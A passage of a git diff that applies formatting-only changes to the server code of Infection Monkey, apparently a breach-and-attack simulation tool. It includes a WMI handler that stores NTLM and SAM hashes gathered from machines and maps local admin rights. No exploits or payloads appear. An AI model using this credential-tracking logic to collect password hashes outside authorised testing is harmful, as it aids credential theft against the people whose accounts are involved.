status=zero_trust_consts.STATUS_PASSED) + zt_seg_findings = Finding.objects( + 
test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_PASSED + ) assert len(zt_seg_findings) == 1 - zt_seg_findings = Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION, - status=zero_trust_consts.STATUS_FAILED) + zt_seg_findings = Finding.objects( + test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_FAILED + ) assert len(zt_seg_findings) == 1 zt_seg_findings = Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/tunneling.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/tunneling.py index 4b755be98..092fd67e2 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/tunneling.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/tunneling.py @@ -2,23 +2,31 @@ import common.common_consts.zero_trust_consts as zero_trust_consts from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.services.telemetry.processing.utils import get_tunnel_host_ip_from_proxy_field -from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import MonkeyZTFindingService +from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import ( + MonkeyZTFindingService, +) def check_tunneling_violation(tunnel_telemetry_json): - if tunnel_telemetry_json['data']['proxy'] is not None: + if tunnel_telemetry_json["data"]["proxy"] is not None: # Monkey is tunneling, create findings tunnel_host_ip = get_tunnel_host_ip_from_proxy_field(tunnel_telemetry_json) - current_monkey = Monkey.get_single_monkey_by_guid(tunnel_telemetry_json['monkey_guid']) - tunneling_events = [Event.create_event( - title="Tunneling event", - message="Monkey on {hostname} tunneled traffic through {proxy}.".format( - hostname=current_monkey.hostname, proxy=tunnel_host_ip), - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, - timestamp=tunnel_telemetry_json['timestamp'] - )] + current_monkey = Monkey.get_single_monkey_by_guid(tunnel_telemetry_json["monkey_guid"]) + tunneling_events = [ + Event.create_event( + title="Tunneling event", + message="Monkey on {hostname} tunneled traffic through {proxy}.".format( + hostname=current_monkey.hostname, proxy=tunnel_host_ip + ), + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, + timestamp=tunnel_telemetry_json["timestamp"], + ) + ] - MonkeyZTFindingService.create_or_add_to_existing(test=zero_trust_consts.TEST_TUNNELING, - status=zero_trust_consts.STATUS_FAILED, events=tunneling_events) + MonkeyZTFindingService.create_or_add_to_existing( + test=zero_trust_consts.TEST_TUNNELING, + status=zero_trust_consts.STATUS_FAILED, + events=tunneling_events, + ) MonkeyZTFindingService.add_malicious_activity_to_timeline(tunneling_events) diff --git a/monkey/monkey_island/cc/services/tests/reporting/test_report.py b/monkey/monkey_island/cc/services/tests/reporting/test_report.py index cc0ea321e..6cdc9befd 100644 --- a/monkey/monkey_island/cc/services/tests/reporting/test_report.py +++ b/monkey/monkey_island/cc/services/tests/reporting/test_report.py @@ -39,8 +39,8 @@ EXPLOIT_TELEMETRY_TELEM = { "ntlm_hash": NT_HASH, } } - } - } + }, + }, } @@ -56,7 +56,7 @@ SYSTEM_INFO_TELEMETRY_TELEM = { "ntlm_hash": NT_HASH, } } - } + }, } NO_CREDS_TELEMETRY_TELEM = { @@ -68,8 +68,8 @@ NO_CREDS_TELEMETRY_TELEM = { "ip_addr": VICTIM_IP, "domain_name": VICTIM_DOMAIN_NAME, }, - "info": {"credentials": {}} - } + "info": {"credentials": {}}, + }, 
} MONKEY_TELEM = {"_id": TELEM_ID["monkey"], "guid": MONKEY_GUID, "hostname": HOSTNAME} diff --git a/monkey/monkey_island/cc/services/tests/test_config.py b/monkey/monkey_island/cc/services/tests/test_config.py index efc04ed89..c43a13be9 100644 --- a/monkey/monkey_island/cc/services/tests/test_config.py +++ b/monkey/monkey_island/cc/services/tests/test_config.py @@ -12,8 +12,7 @@ PORT = 9999 @pytest.fixture def config(monkeypatch): - monkeypatch.setattr("monkey_island.cc.services.config.local_ip_addresses", - lambda: IPS) + monkeypatch.setattr("monkey_island.cc.services.config.local_ip_addresses", lambda: IPS) monkeypatch.setattr(Environment, "_ISLAND_PORT", PORT) config = ConfigService.get_default_config(True) return config @@ -22,12 +21,10 @@ def config(monkeypatch): def test_set_server_ips_in_config_command_servers(config): ConfigService.set_server_ips_in_config(config) expected_config_command_servers = [f"{ip}:{PORT}" for ip in IPS] - assert config["internal"]["island_server"]["command_servers"] ==\ - expected_config_command_servers + assert config["internal"]["island_server"]["command_servers"] == expected_config_command_servers def test_set_server_ips_in_config_current_server(config): ConfigService.set_server_ips_in_config(config) expected_config_current_server = f"{IPS[0]}:{PORT}" - assert config["internal"]["island_server"]["current_server"] ==\ - expected_config_current_server + assert config["internal"]["island_server"]["current_server"] == expected_config_current_server diff --git a/monkey/monkey_island/cc/services/utils/network_utils.py b/monkey/monkey_island/cc/services/utils/network_utils.py index cd4f6c4a1..ba3c76939 100644 --- a/monkey/monkey_island/cc/services/utils/network_utils.py +++ b/monkey/monkey_island/cc/services/utils/network_utils.py @@ -9,13 +9,16 @@ from typing import List from netifaces import AF_INET, ifaddresses, interfaces from ring import lru -__author__ = 'Barak' +__author__ = "Barak" # Local ips function if sys.platform == "win32": + def local_ips(): local_hostname = socket.gethostname() return socket.gethostbyname_ex(local_hostname)[2] + + else: import fcntl @@ -28,12 +31,15 @@ else: max_possible = 8 # initial value while True: struct_bytes = max_possible * struct_size - names = array.array('B', '\0' * struct_bytes) - outbytes = struct.unpack('iL', fcntl.ioctl( - s.fileno(), - 0x8912, # SIOCGIFCONF - struct.pack('iL', struct_bytes, names.buffer_info()[0]) - ))[0] + names = array.array("B", "\0" * struct_bytes) + outbytes = struct.unpack( + "iL", + fcntl.ioctl( + s.fileno(), + 0x8912, # SIOCGIFCONF + struct.pack("iL", struct_bytes, names.buffer_info()[0]), + ), + )[0] if outbytes == struct_bytes: max_possible *= 2 else: @@ -41,8 +47,8 @@ else: namestr = names.tostring() for i in range(0, outbytes, struct_size): - addr = socket.inet_ntoa(namestr[i + 20:i + 24]) - if not addr.startswith('127'): + addr = socket.inet_ntoa(namestr[i + 20 : i + 24]) + if not addr.startswith("127"): result.append(addr) # name of interface is (namestr[i:i+16].split('\0', 1)[0] finally: @@ -50,7 +56,7 @@ else: def is_local_ips(ips: List) -> bool: - filtered_local_ips = [ip for ip in local_ip_addresses() if not ip.startswith('169.254')] + filtered_local_ips = [ip for ip in local_ip_addresses() if not ip.startswith("169.254")] return collections.Counter(ips) == collections.Counter(filtered_local_ips) @@ -63,7 +69,7 @@ def local_ip_addresses(): ip_list = [] for interface in interfaces(): addresses = ifaddresses(interface).get(AF_INET, []) - ip_list.extend([link['addr'] for link in 
addresses if link['addr'] != '127.0.0.1']) + ip_list.extend([link["addr"] for link in addresses if link["addr"] != "127.0.0.1"]) return ip_list @@ -78,10 +84,9 @@ def get_subnets(): addresses = ifaddresses(interface).get(AF_INET, []) subnets.extend( [ - ipaddress.ip_interface(link['addr'] + '/' + link['netmask']).network - for link - in addresses - if link['addr'] != '127.0.0.1' + ipaddress.ip_interface(link["addr"] + "/" + link["netmask"]).network + for link in addresses + if link["addr"] != "127.0.0.1" ] ) return subnets diff --git a/monkey/monkey_island/cc/services/utils/node_states.py b/monkey/monkey_island/cc/services/utils/node_states.py index 3b7e48c65..bf5f2211a 100644 --- a/monkey/monkey_island/cc/services/utils/node_states.py +++ b/monkey/monkey_island/cc/services/utils/node_states.py @@ -6,40 +6,46 @@ from typing import List class NodeStates(Enum): - CLEAN_UNKNOWN = 'clean_unknown' - CLEAN_LINUX = 'clean_linux' - CLEAN_WINDOWS = 'clean_windows' - EXPLOITED_LINUX = 'exploited_linux' - EXPLOITED_WINDOWS = 'exploited_windows' - ISLAND = 'island' - ISLAND_MONKEY_LINUX = 'island_monkey_linux' - ISLAND_MONKEY_LINUX_RUNNING = 'island_monkey_linux_running' - ISLAND_MONKEY_LINUX_STARTING = 'island_monkey_linux_starting' - ISLAND_MONKEY_WINDOWS = 'island_monkey_windows' - ISLAND_MONKEY_WINDOWS_RUNNING = 'island_monkey_windows_running' - ISLAND_MONKEY_WINDOWS_STARTING = 'island_monkey_windows_starting' - MANUAL_LINUX = 'manual_linux' - MANUAL_LINUX_RUNNING = 'manual_linux_running' - MANUAL_WINDOWS = 'manual_windows' - MANUAL_WINDOWS_RUNNING = 'manual_windows_running' - MONKEY_LINUX = 'monkey_linux' - MONKEY_LINUX_RUNNING = 'monkey_linux_running' - MONKEY_WINDOWS = 'monkey_windows' - MONKEY_WINDOWS_RUNNING = 'monkey_windows_running' - MONKEY_WINDOWS_STARTING = 'monkey_windows_starting' - MONKEY_LINUX_STARTING = 'monkey_linux_starting' - MONKEY_WINDOWS_OLD = 'monkey_windows_old' - MONKEY_LINUX_OLD = 'monkey_linux_old' + CLEAN_UNKNOWN = "clean_unknown" + CLEAN_LINUX = "clean_linux" + CLEAN_WINDOWS = "clean_windows" + EXPLOITED_LINUX = "exploited_linux" + EXPLOITED_WINDOWS = "exploited_windows" + ISLAND = "island" + ISLAND_MONKEY_LINUX = "island_monkey_linux" + ISLAND_MONKEY_LINUX_RUNNING = "island_monkey_linux_running" + ISLAND_MONKEY_LINUX_STARTING = "island_monkey_linux_starting" + ISLAND_MONKEY_WINDOWS = "island_monkey_windows" + ISLAND_MONKEY_WINDOWS_RUNNING = "island_monkey_windows_running" + ISLAND_MONKEY_WINDOWS_STARTING = "island_monkey_windows_starting" + MANUAL_LINUX = "manual_linux" + MANUAL_LINUX_RUNNING = "manual_linux_running" + MANUAL_WINDOWS = "manual_windows" + MANUAL_WINDOWS_RUNNING = "manual_windows_running" + MONKEY_LINUX = "monkey_linux" + MONKEY_LINUX_RUNNING = "monkey_linux_running" + MONKEY_WINDOWS = "monkey_windows" + MONKEY_WINDOWS_RUNNING = "monkey_windows_running" + MONKEY_WINDOWS_STARTING = "monkey_windows_starting" + MONKEY_LINUX_STARTING = "monkey_linux_starting" + MONKEY_WINDOWS_OLD = "monkey_windows_old" + MONKEY_LINUX_OLD = "monkey_linux_old" @staticmethod def get_by_keywords(keywords: List) -> NodeStates: - potential_groups = [i for i in NodeStates if NodeStates._is_state_from_keywords(i, keywords)] + potential_groups = [ + i for i in NodeStates if NodeStates._is_state_from_keywords(i, keywords) + ] if len(potential_groups) > 1: - raise MultipleGroupsFoundException("Multiple groups contain provided keywords. " - "Manually build group string to ensure keyword order.") + raise MultipleGroupsFoundException( + "Multiple groups contain provided keywords. 
" + "Manually build group string to ensure keyword order." + ) elif len(potential_groups) == 0: - raise NoGroupsFoundException("No groups found with provided keywords. " - "Check for typos and make sure group codes want to find exists.") + raise NoGroupsFoundException( + "No groups found with provided keywords. " + "Check for typos and make sure group codes want to find exists." + ) return potential_groups[0] @staticmethod diff --git a/monkey/monkey_island/cc/services/utils/node_states_test.py b/monkey/monkey_island/cc/services/utils/node_states_test.py index 1204cb881..98df5455b 100644 --- a/monkey/monkey_island/cc/services/utils/node_states_test.py +++ b/monkey/monkey_island/cc/services/utils/node_states_test.py @@ -4,10 +4,17 @@ from monkey_island.cc.services.utils.node_states import NodeStates, NoGroupsFoun class TestNodeGroups(TestCase): - def test_get_group_by_keywords(self): - self.assertEqual(NodeStates.get_by_keywords(['island']), NodeStates.ISLAND) - self.assertEqual(NodeStates.get_by_keywords(['running', 'linux', 'monkey']), NodeStates.MONKEY_LINUX_RUNNING) - self.assertEqual(NodeStates.get_by_keywords(['monkey', 'linux', 'running']), NodeStates.MONKEY_LINUX_RUNNING) + self.assertEqual(NodeStates.get_by_keywords(["island"]), NodeStates.ISLAND) + self.assertEqual( + NodeStates.get_by_keywords(["running", "linux", "monkey"]), + NodeStates.MONKEY_LINUX_RUNNING, + ) + self.assertEqual( + NodeStates.get_by_keywords(["monkey", "linux", "running"]), + NodeStates.MONKEY_LINUX_RUNNING, + ) with self.assertRaises(NoGroupsFoundException): - NodeStates.get_by_keywords(['bogus', 'values', 'from', 'long', 'list', 'should', 'fail']) + NodeStates.get_by_keywords( + ["bogus", "values", "from", "long", "list", "should", "fail"] + ) diff --git a/monkey/monkey_island/cc/services/version_update.py b/monkey/monkey_island/cc/services/version_update.py index af47bf93a..530a7da0a 100644 --- a/monkey/monkey_island/cc/services/version_update.py +++ b/monkey/monkey_island/cc/services/version_update.py @@ -12,9 +12,9 @@ logger = logging.getLogger(__name__) class VersionUpdateService: - VERSION_SERVER_URL_PREF = 'https://updates.infectionmonkey.com' - VERSION_SERVER_CHECK_NEW_URL = VERSION_SERVER_URL_PREF + '?deployment=%s&monkey_version=%s' - VERSION_SERVER_DOWNLOAD_URL = VERSION_SERVER_CHECK_NEW_URL + '&is_download=true' + VERSION_SERVER_URL_PREF = "https://updates.infectionmonkey.com" + VERSION_SERVER_CHECK_NEW_URL = VERSION_SERVER_URL_PREF + "?deployment=%s&monkey_version=%s" + VERSION_SERVER_DOWNLOAD_URL = VERSION_SERVER_CHECK_NEW_URL + "&is_download=true" newer_version = None @@ -31,7 +31,7 @@ class VersionUpdateService: try: VersionUpdateService.newer_version = VersionUpdateService._check_new_version() except VersionServerConnectionError: - logger.info('Failed updating version number') + logger.info("Failed updating version number") return VersionUpdateService.newer_version @@ -41,7 +41,10 @@ class VersionUpdateService: Checks if newer monkey version is available :return: False if not, version in string format ('1.6.2') otherwise """ - url = VersionUpdateService.VERSION_SERVER_CHECK_NEW_URL % (env_singleton.env.get_deployment(), get_version()) + url = VersionUpdateService.VERSION_SERVER_CHECK_NEW_URL % ( + env_singleton.env.get_deployment(), + get_version(), + ) try: reply = requests.get(url, timeout=7) @@ -49,14 +52,17 @@ class VersionUpdateService: logger.info("Can't get latest monkey version, probably no connection to the internet.") raise VersionServerConnectionError - res = 
reply.json().get('newer_version', None) + res = reply.json().get("newer_version", None) if res is False: return res - [int(x) for x in res.split('.')] # raises value error if version is invalid format + [int(x) for x in res.split(".")] # raises value error if version is invalid format return res @staticmethod def get_download_link(): - return VersionUpdateService.VERSION_SERVER_DOWNLOAD_URL % (env_singleton.env.get_deployment(), get_version()) + return VersionUpdateService.VERSION_SERVER_DOWNLOAD_URL % ( + env_singleton.env.get_deployment(), + get_version(), + ) diff --git a/monkey/monkey_island/cc/services/wmi_handler.py b/monkey/monkey_island/cc/services/wmi_handler.py index 284ae95df..fe401ce38 100644 --- a/monkey/monkey_island/cc/services/wmi_handler.py +++ b/monkey/monkey_island/cc/services/wmi_handler.py @@ -1,11 +1,11 @@ from monkey_island.cc.database import mongo from monkey_island.cc.services.groups_and_users_consts import GROUPTYPE, USERTYPE -__author__ = 'maor.rayzin' +__author__ = "maor.rayzin" class WMIHandler(object): - ADMINISTRATORS_GROUP_KNOWN_SID = '1-5-32-544' + ADMINISTRATORS_GROUP_KNOWN_SID = "1-5-32-544" def __init__(self, monkey_id, wmi_info, user_secrets): @@ -19,11 +19,11 @@ class WMIHandler(object): self.services = "" self.products = "" else: - self.users_info = wmi_info['Win32_UserAccount'] - self.groups_info = wmi_info['Win32_Group'] - self.groups_and_users = wmi_info['Win32_GroupUser'] - self.services = wmi_info['Win32_Service'] - self.products = wmi_info['Win32_Product'] + self.users_info = wmi_info["Win32_UserAccount"] + self.groups_info = wmi_info["Win32_Group"] + self.groups_and_users = wmi_info["Win32_GroupUser"] + self.services = wmi_info["Win32_Service"] + self.products = wmi_info["Win32_Product"] def process_and_handle_wmi_info(self): @@ -37,62 +37,66 @@ class WMIHandler(object): self.update_critical_services() def update_critical_services(self): - critical_names = ("W3svc", "MSExchangeServiceHost", "dns", 'MSSQL$SQLEXPRES') - mongo.db.monkey.update({'_id': self.monkey_id}, {'$set': {'critical_services': []}}) + critical_names = ("W3svc", "MSExchangeServiceHost", "dns", "MSSQL$SQLEXPRES") + mongo.db.monkey.update({"_id": self.monkey_id}, {"$set": {"critical_services": []}}) - services_names_list = [str(i['Name'])[2:-1] for i in self.services] - products_names_list = [str(i['Name'])[2:-2] for i in self.products] + services_names_list = [str(i["Name"])[2:-1] for i in self.services] + products_names_list = [str(i["Name"])[2:-2] for i in self.products] for name in critical_names: if name in services_names_list or name in products_names_list: - mongo.db.monkey.update({'_id': self.monkey_id}, {'$addToSet': {'critical_services': name}}) + mongo.db.monkey.update( + {"_id": self.monkey_id}, {"$addToSet": {"critical_services": name}} + ) def build_entity_document(self, entity_info, monkey_id=None): general_properties_dict = { - 'SID': str(entity_info['SID'])[4:-1], - 'name': str(entity_info['Name'])[2:-1], - 'machine_id': monkey_id, - 'member_of': [], - 'admin_on_machines': [] + "SID": str(entity_info["SID"])[4:-1], + "name": str(entity_info["Name"])[2:-1], + "machine_id": monkey_id, + "member_of": [], + "admin_on_machines": [], } if monkey_id: - general_properties_dict['domain_name'] = None + general_properties_dict["domain_name"] = None else: - general_properties_dict['domain_name'] = str(entity_info['Domain'])[2:-1] + general_properties_dict["domain_name"] = str(entity_info["Domain"])[2:-1] return general_properties_dict def add_users_to_collection(self): for 
user in self.users_info: - if not user.get('LocalAccount'): + if not user.get("LocalAccount"): base_entity = self.build_entity_document(user) else: base_entity = self.build_entity_document(user, self.monkey_id) - base_entity['NTLM_secret'] = self.users_secrets.get(base_entity['name'], {}).get('ntlm_hash') - base_entity['SAM_secret'] = self.users_secrets.get(base_entity['name'], {}).get('sam') - base_entity['secret_location'] = [] + base_entity["NTLM_secret"] = self.users_secrets.get(base_entity["name"], {}).get( + "ntlm_hash" + ) + base_entity["SAM_secret"] = self.users_secrets.get(base_entity["name"], {}).get("sam") + base_entity["secret_location"] = [] - base_entity['type'] = USERTYPE - self.info_for_mongo[base_entity.get('SID')] = base_entity + base_entity["type"] = USERTYPE + self.info_for_mongo[base_entity.get("SID")] = base_entity def add_groups_to_collection(self): for group in self.groups_info: - if not group.get('LocalAccount'): + if not group.get("LocalAccount"): base_entity = self.build_entity_document(group) else: base_entity = self.build_entity_document(group, self.monkey_id) - base_entity['entities_list'] = [] - base_entity['type'] = GROUPTYPE - self.info_for_mongo[base_entity.get('SID')] = base_entity + base_entity["entities_list"] = [] + base_entity["type"] = GROUPTYPE + self.info_for_mongo[base_entity.get("SID")] = base_entity def create_group_user_connection(self): for group_user_couple in self.groups_and_users: - group_part = group_user_couple['GroupComponent'] - child_part = group_user_couple['PartComponent'] - group_sid = str(group_part['SID'])[4:-1] - groups_entities_list = self.info_for_mongo[group_sid]['entities_list'] - child_sid = '' + group_part = group_user_couple["GroupComponent"] + child_part = group_user_couple["PartComponent"] + group_sid = str(group_part["SID"])[4:-1] + groups_entities_list = self.info_for_mongo[group_sid]["entities_list"] + child_sid = "" if isinstance(child_part, str): child_part = str(child_part) @@ -100,62 +104,79 @@ class WMIHandler(object): domain_name = None if "cimv2:Win32_UserAccount" in child_part: # domain user - domain_name = child_part.split('cimv2:Win32_UserAccount.Domain="')[1].split('",Name="')[0] - name = child_part.split('cimv2:Win32_UserAccount.Domain="')[1].split('",Name="')[1][:-2] + domain_name = child_part.split('cimv2:Win32_UserAccount.Domain="')[1].split( + '",Name="' + )[0] + name = child_part.split('cimv2:Win32_UserAccount.Domain="')[1].split( + '",Name="' + )[1][:-2] if "cimv2:Win32_Group" in child_part: # domain group - domain_name = child_part.split('cimv2:Win32_Group.Domain="')[1].split('",Name="')[0] - name = child_part.split('cimv2:Win32_Group.Domain="')[1].split('",Name="')[1][:-2] + domain_name = child_part.split('cimv2:Win32_Group.Domain="')[1].split( + '",Name="' + )[0] + name = child_part.split('cimv2:Win32_Group.Domain="')[1].split('",Name="')[1][ + :-2 + ] for entity in self.info_for_mongo: - if self.info_for_mongo[entity]['name'] == name and \ - self.info_for_mongo[entity]['domain'] == domain_name: - child_sid = self.info_for_mongo[entity]['SID'] + if ( + self.info_for_mongo[entity]["name"] == name + and self.info_for_mongo[entity]["domain"] == domain_name + ): + child_sid = self.info_for_mongo[entity]["SID"] else: - child_sid = str(child_part['SID'])[4:-1] + child_sid = str(child_part["SID"])[4:-1] if child_sid and child_sid not in groups_entities_list: groups_entities_list.append(child_sid) if child_sid: if child_sid in self.info_for_mongo: - 
self.info_for_mongo[child_sid]['member_of'].append(group_sid) + self.info_for_mongo[child_sid]["member_of"].append(group_sid) def insert_info_to_mongo(self): for entity in list(self.info_for_mongo.values()): - if entity['machine_id']: + if entity["machine_id"]: # Handling for local entities. - mongo.db.groupsandusers.update({'SID': entity['SID'], - 'machine_id': entity['machine_id']}, entity, upsert=True) + mongo.db.groupsandusers.update( + {"SID": entity["SID"], "machine_id": entity["machine_id"]}, entity, upsert=True + ) else: # Handlings for domain entities. - if not mongo.db.groupsandusers.find_one({'SID': entity['SID']}): + if not mongo.db.groupsandusers.find_one({"SID": entity["SID"]}): mongo.db.groupsandusers.insert_one(entity) else: # if entity is domain entity, add the monkey id of current machine to secrets_location. # (found on this machine) - if entity.get('NTLM_secret'): - mongo.db.groupsandusers.update_one({'SID': entity['SID'], 'type': USERTYPE}, - {'$addToSet': {'secret_location': self.monkey_id}}) + if entity.get("NTLM_secret"): + mongo.db.groupsandusers.update_one( + {"SID": entity["SID"], "type": USERTYPE}, + {"$addToSet": {"secret_location": self.monkey_id}}, + ) def update_admins_retrospective(self): for profile in self.info_for_mongo: - groups_from_mongo = mongo.db.groupsandusers.find({ - 'SID': {'$in': self.info_for_mongo[profile]['member_of']}}, - {'admin_on_machines': 1}) + groups_from_mongo = mongo.db.groupsandusers.find( + {"SID": {"$in": self.info_for_mongo[profile]["member_of"]}}, + {"admin_on_machines": 1}, + ) for group in groups_from_mongo: - if group['admin_on_machines']: - mongo.db.groupsandusers.update_one({'SID': self.info_for_mongo[profile]['SID']}, - {'$addToSet': {'admin_on_machines': { - '$each': group['admin_on_machines']}}}) + if group["admin_on_machines"]: + mongo.db.groupsandusers.update_one( + {"SID": self.info_for_mongo[profile]["SID"]}, + {"$addToSet": {"admin_on_machines": {"$each": group["admin_on_machines"]}}}, + ) def add_admin(self, group, machine_id): - for sid in group['entities_list']: - mongo.db.groupsandusers.update_one({'SID': sid}, - {'$addToSet': {'admin_on_machines': machine_id}}) - entity_details = mongo.db.groupsandusers.find_one({'SID': sid}, - {'type': USERTYPE, 'entities_list': 1}) - if entity_details.get('type') == GROUPTYPE: + for sid in group["entities_list"]: + mongo.db.groupsandusers.update_one( + {"SID": sid}, {"$addToSet": {"admin_on_machines": machine_id}} + ) + entity_details = mongo.db.groupsandusers.find_one( + {"SID": sid}, {"type": USERTYPE, "entities_list": 1} + ) + if entity_details.get("type") == GROUPTYPE: self.add_admin(entity_details, machine_id) diff --git a/monkey/monkey_island/cc/services/zero_trust/monkey_findings/monkey_zt_details_service.py b/monkey/monkey_island/cc/services/zero_trust/monkey_findings/monkey_zt_details_service.py index 167934d29..7870b97bd 100644 --- a/monkey/monkey_island/cc/services/zero_trust/monkey_findings/monkey_zt_details_service.py +++ b/monkey/monkey_island/cc/services/zero_trust/monkey_findings/monkey_zt_details_service.py @@ -12,26 +12,34 @@ MAX_EVENT_FETCH_CNT = 100 class MonkeyZTDetailsService: - @staticmethod def fetch_details_for_display(finding_id: ObjectId) -> dict: - pipeline = [{'$match': {'_id': finding_id}}, - {'$addFields': {'oldest_events': {'$slice': ['$events', int(MAX_EVENT_FETCH_CNT / 2)]}, - 'latest_events': {'$slice': ['$events', int(-1 * MAX_EVENT_FETCH_CNT / 2)]}, - 'event_count': {'$size': '$events'}}}, - {'$unset': ['events']}] + pipeline = [ + 
{"$match": {"_id": finding_id}}, + { + "$addFields": { + "oldest_events": {"$slice": ["$events", int(MAX_EVENT_FETCH_CNT / 2)]}, + "latest_events": {"$slice": ["$events", int(-1 * MAX_EVENT_FETCH_CNT / 2)]}, + "event_count": {"$size": "$events"}, + } + }, + {"$unset": ["events"]}, + ] detail_list = list(MonkeyFindingDetails.objects.aggregate(*pipeline)) if detail_list: details = detail_list[0] - details['latest_events'] = MonkeyZTDetailsService._remove_redundant_events(details['event_count'], - details['latest_events']) + details["latest_events"] = MonkeyZTDetailsService._remove_redundant_events( + details["event_count"], details["latest_events"] + ) return details else: raise FindingWithoutDetailsError(f"Finding {finding_id} had no details.") @staticmethod - def _remove_redundant_events(fetched_event_count: int, latest_events: List[object]) -> List[object]: - overlap_count = fetched_event_count - int(MAX_EVENT_FETCH_CNT/2) + def _remove_redundant_events( + fetched_event_count: int, latest_events: List[object] + ) -> List[object]: + overlap_count = fetched_event_count - int(MAX_EVENT_FETCH_CNT / 2) # None of 'latest_events' are in 'oldest_events' if overlap_count >= MAX_EVENT_FETCH_CNT: return latest_events @@ -41,4 +49,4 @@ class MonkeyZTDetailsService: # Some of 'latest_events' are already in 'oldest_events'. # Return only those that are not else: - return latest_events[-1 * overlap_count:] + return latest_events[-1 * overlap_count :] diff --git a/monkey/monkey_island/cc/services/zero_trust/monkey_findings/monkey_zt_finding_service.py b/monkey/monkey_island/cc/services/zero_trust/monkey_findings/monkey_zt_finding_service.py index d8e439c71..68f09fbe9 100644 --- a/monkey/monkey_island/cc/services/zero_trust/monkey_findings/monkey_zt_finding_service.py +++ b/monkey/monkey_island/cc/services/zero_trust/monkey_findings/monkey_zt_finding_service.py @@ -9,7 +9,6 @@ from monkey_island.cc.models.zero_trust.monkey_finding_details import MonkeyFind class MonkeyZTFindingService: - @staticmethod def create_or_add_to_existing(test: str, status: str, events: List[Event]): """ @@ -20,7 +19,9 @@ class MonkeyZTFindingService: when this function should be used. 
""" existing_findings = list(MonkeyFinding.objects(test=test, status=status)) - assert (len(existing_findings) < 2), "More than one finding exists for {}:{}".format(test, status) + assert len(existing_findings) < 2, "More than one finding exists for {}:{}".format( + test, status + ) if len(existing_findings) == 0: MonkeyZTFindingService.create_new_finding(test, status, events) @@ -42,13 +43,18 @@ class MonkeyZTFindingService: @staticmethod def get_events_by_finding(finding_id: str) -> List[object]: finding = MonkeyFinding.objects.get(id=finding_id) - pipeline = [{'$match': {'_id': ObjectId(finding.details.id)}}, - {'$unwind': '$events'}, - {'$project': {'events': '$events'}}, - {'$replaceRoot': {'newRoot': '$events'}}] + pipeline = [ + {"$match": {"_id": ObjectId(finding.details.id)}}, + {"$unwind": "$events"}, + {"$project": {"events": "$events"}}, + {"$replaceRoot": {"newRoot": "$events"}}, + ] return list(MonkeyFindingDetails.objects.aggregate(*pipeline)) @staticmethod def add_malicious_activity_to_timeline(events): - MonkeyZTFindingService.create_or_add_to_existing(test=zero_trust_consts.TEST_MALICIOUS_ACTIVITY_TIMELINE, - status=zero_trust_consts.STATUS_VERIFY, events=events) + MonkeyZTFindingService.create_or_add_to_existing( + test=zero_trust_consts.TEST_MALICIOUS_ACTIVITY_TIMELINE, + status=zero_trust_consts.STATUS_VERIFY, + events=events, + ) diff --git a/monkey/monkey_island/cc/services/zero_trust/monkey_findings/test_monkey_zt_details_service.py b/monkey/monkey_island/cc/services/zero_trust/monkey_findings/test_monkey_zt_details_service.py index a53ef70c8..191685779 100644 --- a/monkey/monkey_island/cc/services/zero_trust/monkey_findings/test_monkey_zt_details_service.py +++ b/monkey/monkey_island/cc/services/zero_trust/monkey_findings/test_monkey_zt_details_service.py @@ -1,25 +1,27 @@ from monkey_island.cc.services.zero_trust.monkey_findings import monkey_zt_details_service -from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_details_service import MonkeyZTDetailsService +from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_details_service import ( + MonkeyZTDetailsService, +) def test__remove_redundant_events(monkeypatch): - monkeypatch.setattr(monkey_zt_details_service, 'MAX_EVENT_FETCH_CNT', 6) + monkeypatch.setattr(monkey_zt_details_service, "MAX_EVENT_FETCH_CNT", 6) # No events are redundant, 8 events in the database, but we display only 6 (3 latest and 3 oldest) - latest_events = ['6', '7', '8'] - _do_redundant_event_removal_test(latest_events, 8, ['6', '7', '8']) + latest_events = ["6", "7", "8"] + _do_redundant_event_removal_test(latest_events, 8, ["6", "7", "8"]) # All latest events are redundant (only 3 events in db and we fetched them twice) - latest_events = ['1', '2', '3'] + latest_events = ["1", "2", "3"] _do_redundant_event_removal_test(latest_events, 3, []) # Some latest events are redundant (5 events in db and we fetched 3 oldest and 3 latest) - latest_events = ['3', '4', '5'] - _do_redundant_event_removal_test(latest_events, 5, ['4', '5']) + latest_events = ["3", "4", "5"] + _do_redundant_event_removal_test(latest_events, 5, ["4", "5"]) # None of the events are redundant (6 events in db and we fetched 3 oldest and 3 latest) - latest_events = ['4', '5', '6'] - _do_redundant_event_removal_test(latest_events, 6, ['4', '5', '6']) + latest_events = ["4", "5", "6"] + _do_redundant_event_removal_test(latest_events, 6, ["4", "5", "6"]) # No events fetched, should return empty array also latest_events = [] diff --git 
a/monkey/monkey_island/cc/services/zero_trust/monkey_findings/test_monkey_zt_finding_service.py b/monkey/monkey_island/cc/services/zero_trust/monkey_findings/test_monkey_zt_finding_service.py index 80df71786..b92a52ae1 100644 --- a/monkey/monkey_island/cc/services/zero_trust/monkey_findings/test_monkey_zt_finding_service.py +++ b/monkey/monkey_island/cc/services/zero_trust/monkey_findings/test_monkey_zt_finding_service.py @@ -6,43 +6,46 @@ from common.common_consts import zero_trust_consts from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.models.zero_trust.finding import Finding from monkey_island.cc.models.zero_trust.monkey_finding import MonkeyFinding -from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import MonkeyZTFindingService +from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import ( + MonkeyZTFindingService, +) from monkey_island.cc.test_common.fixtures import FixtureEnum EVENTS = [ Event.create_event( - title='Process list', - message='Monkey on gc-pc-244 scanned the process list', - event_type='monkey_local', - 